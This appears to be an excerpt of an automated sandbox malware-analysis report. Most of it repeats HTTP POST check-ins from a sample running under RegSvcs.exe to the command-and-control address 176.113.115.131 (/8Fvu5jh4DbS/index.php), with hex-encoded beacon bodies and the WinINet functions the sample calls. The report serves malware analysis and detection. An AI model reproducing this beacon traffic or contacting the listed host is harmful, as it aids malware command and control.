                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004105B0 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile, | 3_2_004105B0
Source: unknown | HTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 176.113.115.131 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
